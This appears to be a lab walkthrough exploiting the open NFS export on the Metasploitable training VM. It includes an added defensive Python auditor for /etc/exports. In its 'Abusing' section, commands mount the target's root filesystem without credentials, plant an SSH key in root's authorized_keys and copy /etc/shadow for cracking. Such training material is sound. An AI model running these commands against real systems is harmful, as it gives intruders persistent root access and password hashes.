Metasploitable/NFS
From charlesreid1
Network File System
The Metasploitable virtual machine has its Network File System (NFS) ports open to the network, which leaves it wide open to attack. (More on network file systems generally at Linux/NFS.)
The Metasploitable machine is at 10.0.0.27.
Start by checking which RPC services are registered on the target. Use the rpcinfo command to do that:
# rpcinfo -p 10.0.0.27
This returns the RPC programs registered with the portmapper, along with the ports they listen on. We can see that there is an NFS service listening on port 2049 (and a mountd service, which is what answers mount requests):
root@morpheus:~# rpcinfo -p 10.0.0.27
   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  38085  status
    100024    1   tcp  52004  status
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100021    1   udp  60702  nlockmgr
    100021    3   udp  60702  nlockmgr
    100021    4   udp  60702  nlockmgr
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100021    1   tcp  34385  nlockmgr
    100021    3   tcp  34385  nlockmgr
    100021    4   tcp  34385  nlockmgr
    100005    1   udp  45599  mountd
    100005    1   tcp  42810  mountd
    100005    2   udp  45599  mountd
    100005    2   tcp  42810  mountd
    100005    3   udp  45599  mountd
    100005    3   tcp  42810  mountd
Now use the showmount command to list which file systems this NFS server exports, and to whom:
root@morpheus:~# showmount -e 10.0.0.27
Export list for 10.0.0.27:
/ *
Woot - the entire filesystem (/) is exported to every host (*), so it is mountable by anyone; the steps below show it is writable too.
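The export list above is the whole problem in one line: the filesystem root, exported to every host. The following is an added example, not code from the original page, of a small Python auditor that parses either the text of /etc/exports or the output of showmount -e and flags the properties a defender would want removed (any-host export, root of the filesystem, rw, no_root_squash, insecure). The sample inputs are constructed; in particular, the rw,no_root_squash options on the first exports line are an assumption about how the Metasploitable export is written, since the page only shows "/ *". The hardened entries next to it show what a scoped export looks like for comparison.

```python
"""Audit NFS exports for the weaknesses seen on Metasploitable (added example).

Handles two inputs: the text of /etc/exports (which carries the options) and the
output of `showmount -e` (paths and clients only). Sample inputs are constructed.
"""
import re
from dataclasses import dataclass

# Constructed sample in /etc/exports syntax. The first entry is an assumption
# about how the "/ *" export on Metasploitable is written; the other two are
# hardened entries for comparison.
SAMPLE_EXPORTS = """\
# wide open: filesystem root, any client, writable, remote root keeps uid 0
/ *(rw,no_root_squash)
# hardened: one subtree, one subnet, read-only, root squashed, synchronous writes
/srv/share 10.0.0.0/24(ro,root_squash,sync)
# writable but scoped to a single host, root squashed
/srv/backup 10.0.0.5(rw,root_squash,sync)
"""

# Constructed sample mirroring the showmount output shown on the page.
SAMPLE_SHOWMOUNT = """\
Export list for 10.0.0.27:
/ *
"""

# host spec optionally followed by a parenthesised option list, e.g. 10.0.0.0/24(ro,sync)
CLIENT_RE = re.compile(r"(?P<host>[^\s(]+)(?:\((?P<opts>[^)]*)\))?")
# showmount prints "(everyone)" instead of "*" on some systems
ANY_HOST = {"*", "(everyone)"}


@dataclass
class Finding:
    path: str
    host: str
    issues: list


def parse_exports(text):
    """Return (path, host, options) triples from /etc/exports text."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) < 2:  # path with no client spec: nothing to audit here
            continue
        path, clients = parts
        for m in CLIENT_RE.finditer(clients):
            opts = {o.strip() for o in (m.group("opts") or "").split(",") if o.strip()}
            entries.append((path, m.group("host"), opts))
    return entries


def parse_showmount(text):
    """Return (path, host, options) triples from `showmount -e` output.

    showmount does not print export options, so the option set is empty."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("Export list"):
            continue
        path, *clients = line.split()
        for host in ",".join(clients).split(","):  # clients are comma separated
            if host:
                entries.append((path, host, set()))
    return entries


def audit_entry(path, host, opts):
    """Flag the properties that made the Metasploitable export dangerous."""
    issues = []
    if host in ANY_HOST:
        issues.append("exported to any host (*)")
    if path == "/":
        issues.append("exports the entire filesystem (/)")
    if "rw" in opts:
        issues.append("writable (rw)")
    if "no_root_squash" in opts:
        issues.append("remote root keeps uid 0 (no_root_squash)")
    if "insecure" in opts:
        issues.append("accepts requests from unprivileged source ports (insecure)")
    return Finding(path, host, issues)


def audit_exports(text):
    return [audit_entry(*e) for e in parse_exports(text)]


def audit_showmount(text):
    return [audit_entry(*e) for e in parse_showmount(text)]


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS) + audit_showmount(SAMPLE_SHOWMOUNT):
        status = "; ".join(f.issues) if f.issues else "ok"
        print(f"{f.path:<12} {f.host:<14} {status}")
```

Run it as a script to see the findings; the wide-open entry collects four issues, the read-only subnet export collects none, and the single-host rw export is reported only as writable so it can be reviewed rather than rejected outright. On a real server the same check can be pointed at the live /etc/exports, and exportfs -v will show the effective options that the kernel actually applies.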
To mount the network filesystem, the RPC service rpcbind has to be running on our own (client) machine:
# service rpcbind start
Now we can mount the filesystem at the IP address, with no credentials:
# mkdir /tmp/r00t
# mount -t nfs 10.0.0.27:/ /tmp/r00t
Abusing
Now we can abuse our write access to the filesystem by appending our SSH public key to the remote machine's list of trusted keys, and obtain passwordless remote access as root:
# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
We can also copy the shadow file to the local disk, to crack with John the Ripper:
# cp /tmp/r00t/etc/shadow ~/victim_shadow_file
We could also run Metasploit's post modules for information gathering on Linux machines.
Dismount When Finished
Unmount when finished, to make sure all those goodies you left behind are actually flushed to the remote disk:
# umount /tmp/r00t